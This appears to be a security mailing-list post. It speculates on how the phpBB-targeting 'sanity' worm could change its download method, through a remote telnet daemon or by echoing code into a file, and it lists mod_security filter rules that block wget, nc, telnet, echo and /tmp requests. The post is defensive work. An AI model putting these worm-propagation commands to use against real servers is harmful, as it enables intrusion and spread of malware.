<<< Date Index >>>     <<< Thread Index >>>

Sanity Worm Concepts




I was writing some new rules for mod_security (http://www.modsecurity.org) to 
try and trap other methods that this sanity worm might try to exploit later. 
Unfortunately the ideas I came up with are slightly worrying with how easily 
this worm could actually spread. Right now the sanity worm uses perl and wget 
to download code from remote servers but this could be changed to a few other 
methods. These methods have not *yet* been used but I'm sure it is only time 
until there is one.

----------------
The first method: 
Remote daemon:
Most, if not all, servers have some method to retrieve files from a remote 
server. Right now the worm uses wget to download its code. However an attacker 
could write a remote daemon to distribute the worm's code. 

Instead of using: wget http://www.url.com/wormcode.txt they could (for example) 
telnet url.com:port > wormcode.txt and execute from that point.

It is pretty easy to write a simple daemon to dump the worm code to any 
incoming connection and disconnect. They could spread this daemon with the 
existing worm with very little modification. Then when the infected machine 
scans for new targets it can use its own local daemon. Obviously this method 
would not be as effective as the others because many servers have firewalls to 
block unauthorized port usage.

----------------
The second method:
Echo code to file directly:
Instead of wget it has to echo the entire worm code via the URL. This might not 
be possible due to a length restriction imposed by the httpd. However, in 
theory the worm code could be echo'd to file by the existing worm with little 
modification

Instead of wget http://www.url.com/wormcode.txt they can echo "[--worm code--]" 
> wormcode.txt and go from there. 

----------------
I have not tested these methods but after discussing them with eth00, we both 
think it was better to post this to bugtraq in the hopes it may help other 
people prevent future attacks from new variations of this worm and help 
development of fixes to prevent future problems. While this worm currently uses 
perl it can be obviously re-written to avoid obvious mod_security (and other) 
rules. I could write proof of concept versions of the sanity worm but I feel it 
would be better to leave this out of the post.

For those more interested in the mod_security rules:

SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "perl "
SecFilterSelective THE_REQUEST "lynx "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "nc "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp"
SecFilterSelective THE_REQUEST "cd /var/tmp"

I am aware that I could write them all with (for example) "wget\x20" but on 
apache 1.3 this seems to fail. I am also aware they have the possibility to 
block legitimate requests but these calls should not be made via a http GET 
request. They are no means complete (all the usual compilers are missing) or 
free of errors. A rule for "links " could also be added but this will break CMS 
systems like phpnuke. These rules have been tested with apache 1.3.33 and php 
4.3.10 (and also on phpbb 2.0.1 and 2.0.11) and they do not affect regular 
phpbb usage in any way but prevent the current worm exploits and cover the 
concepts I discussed above. Other rules can be added as methods are discovered 
until the vulnerability is fixed. I was under the impression php 4.3.10 fixed 
this problem but I have heard that a new sanity which spreads along with an 
sshd and still works with php 4.3.10 (The rules prevent this worm version too).

Hope this helps,
~Andy